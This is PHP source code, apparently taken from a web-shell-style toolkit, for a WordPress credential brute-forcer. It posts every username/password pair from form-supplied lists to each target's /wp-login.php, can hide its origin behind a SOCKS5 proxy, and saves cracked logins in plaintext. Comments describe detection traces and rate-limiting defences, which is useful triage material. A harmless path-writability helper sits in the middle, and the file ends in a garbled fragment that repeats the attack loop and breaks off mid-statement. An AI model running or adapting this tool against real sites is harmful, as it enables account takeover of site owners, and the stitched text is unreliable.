/**
 * Password-guessing routine aimed at WordPress login pages, driven by an HTML form.
 *
 * Reads three newline-separated lists from $_POST ('hosts', 'usernames', 'passwords'),
 * tries every username/password pair against each host's /wp-login.php, prints the
 * outcome as HTML and records each hit in the `brute` table.
 *
 * Traces this block leaves, useful for detection and triage:
 *  - Target side: repeated POSTs to /wp-login.php carrying log, pwd, wp-submit,
 *    redirect_to and testcookie=1. The wp-submit value is the fixed string "Giri"
 *    followed by a non-ASCII character. No CURLOPT_USERAGENT is set in this block.
 *  - Hosting side: a cookie jar file named "coki.txt" (relative path), and rows in
 *    `brute` (service, credentials) holding "host:80" and "user:password" in clear text.
 *  - When USE_PROXY == 1 the requests leave through a SOCKS5 proxy, so the source
 *    address in the target's logs need not be the host running this script.
 *
 * The loop has no delay or attempt cap of its own, so it depends on the target allowing
 * unlimited login attempts; lockout or rate limiting on wp-login.php and a second
 * factor are the controls that bear on it.
 *
 * NOTE(review): eregi() and mysql_escape_string() were removed in PHP 7.0, so this
 * code path only runs on PHP 5.x.
 *
 * @return void Output is echoed directly; nothing is returned.
 */
function wp_brute() {
    if (isset($_POST['hosts']) && isset($_POST['passwords']) && isset($_POST['usernames'])) {
        $conn = new mysqli(SQL_HOST, SQL_USER, SQL_PWD, SQL_DB);
        // filter() is defined outside this block; what it strips is not visible here.
        $hosts = trim(filter($_POST['hosts']));
        $passwords = trim(filter($_POST['passwords']));
        $usernames = trim(filter($_POST['usernames']));
        if ($passwords && $usernames && $hosts) {
            // One entry per line in each list.
            $hostsx = explode("\n", $hosts);
            $usersx = explode("\n", $usernames);
            $passsx = explode("\n", $passwords);
            echo '<div class="post">';
            echo '<h2 class="title"><a href="#">Results</a></h2>';
            echo '<div class="entry">';
            echo '<p class="meta"> Wordpress CMS Bruteforce • Broken credentials will be stored in database';
            foreach ($hostsx as $host) {
                $host = RemoveLastSlash($host);
                // Per-host flag: set to 1 once a pair is accepted.
                $hxd = 0;
                // Scheme and "www." are stripped and plain http:// is forced, so every
                // request (credentials included) goes out unencrypted unless the target redirects.
                $host = str_replace(array("http://", "https://", "www."), "", trim($host));
                $host = "http://" . $host;
                $wpAdmin = $host . '/wp-admin/';
                // url_exists() is defined elsewhere; hosts without a reachable login page are skipped.
                if (!url_exists($host . "/wp-login.php")) {
                    echo "<p>" . $host . " - <font color='#990000'>Login page not found</font></p>";
                    ob_flush();
                    flush();
                    continue;
                }
                foreach ($usersx as $username) {
                    foreach ($passsx as $password) {
                        // A new curl handle per attempt; no curl_close() appears in this block.
                        $ch = curl_init();
                        if (USE_PROXY == 1) {
                            curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
                            curl_setopt($ch, CURLOPT_PROXY, PROXY_IP . ':' . PROXY_PORT);
                        }
                        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                        curl_setopt($ch, CURLOPT_URL, $host . '/wp-login.php');
                        // The same cookie file is read and written for every host and attempt.
                        curl_setopt($ch, CURLOPT_COOKIEJAR, "coki.txt");
                        curl_setopt($ch, CURLOPT_COOKIEFILE, "coki.txt");
                        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
                        curl_setopt($ch, CURLOPT_POST, TRUE);
                        curl_setopt($ch, CURLOPT_POSTFIELDS, "log=" . $username . "&pwd=" . $password . "&wp-submit=Giri‏" . "&redirect_to=" . $wpAdmin . "&testcookie=1");
                        $login = curl_exec($ch);
                        // Success is inferred from the response body mentioning "profile.php"
                        // (case-insensitive match) after redirects have been followed.
                        if (eregi("profile.php", $login)) {
                            $hxd = 1;
                            echo "<p>" . $host . " - Cracked! Username - <font color='#990000'>" . $username . "</font> & Password : <font color='#990000'>" . $password . "</font></p>";
                            // Recovered credentials are stored in plaintext; whoever holds
                            // this database holds working logins for the listed sites.
                            mysqli_query($conn, "INSERT INTO brute(service, credentials) VALUES ('" . mysql_escape_string($host) . ":80', '" . mysql_escape_string($username) . ":" . mysql_escape_string($password) . "')", $conn);
                            ob_flush();
                            flush();
                            break;
                        }
                    }
                    // Stop trying further usernames on this host after the first hit.
                    if ($hxd == 1) {
                        break;
                    }
                }
                if ($hxd == 0) {
                    echo "<p>" . $host . " - <font color='#990000'>Failed</font></p>";
                    ob_flush();
                    flush();
                }
            }
            echo '</div></div>';
        } else {
            echo "<h2><font color='#990000'>All fields are required!</font></h3>";
        }
    }
    // NOTE(review): $conn is only assigned inside the isset() branch above.
    mysqli_close($conn);
}
/**
 * Checks whether a file or directory could be created at the given location.
 *
 * Finds the nearest existing directory above the target and reports whether it is
 * writable; if that directory is not writable the result is false.
 *
 * NOTE(review): when the walk strips the path down to an empty string (e.g. an
 * absolute path with no existing ancestor below the root), the fallback tests the
 * current directory '.' rather than '/'. Confirm that is intended.
 *
 * @param $FileName Path of the file or directory that is about to be created.
 * @return bool
 */
function IsPossiblyCreated($FileName)
{
    $target = RemoveLastSlash($FileName);
    $candidate = GetPathName($target, false);

    // Number of '/'-separated levels that can still be stripped from the candidate.
    $levelsLeft = substr_count($candidate, '/');

    while (true) {
        // The first existing directory on the way up decides the answer.
        if (is_dir($candidate)) {
            return is_writable($candidate);
        }
        if ($levelsLeft <= 0) {
            break;
        }
        $levelsLeft--;
        // Drop the last path segment and try its parent.
        $cut = strrpos($candidate, '/');
        $candidate = substr($candidate, 0, $cut);
    }

    // No existing ancestor found in the path itself: fall back to the working directory.
    return is_writable('.');
}
888888 999999'; } echo '</textarea></td> </tr> <tr><td colspan="4"><center><br><input class="inputzbut" type="submit" name="submit" value="Brute Now" /></center>'; if ($_POST) { $hosts = trim(filter($_POST['hosts'])); $passwords = trim(filter($_POST['passwords'])); $usernames = trim(filter($_POST['usernames'])); if ($passwords && $usernames && $hosts) { $hosts_explode = explode("\n", $hosts); $usernames_explode = explode("\n", $usernames); $passwords_explode = explode("\n", $passwords); foreach ($hosts_explode as $host) { $host = RemoveLastSlash($host); $hacked = 0; $host = str_replace(array("http://", "https://", "www."), "", trim($host)); $host = "http://" . $host; $wpAdmin = $host . '/wp-admin/'; if (!url_exists($host . "/wp-login.php")) { echo "<p>" . $host . " => <font color='red'>Error In Login Page !</font></p>"; ob_flush(); flush(); continue; } foreach ($usernames_explode as $username) { foreach ($passwords_explode as $password) { $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $host . '/wp-login.php');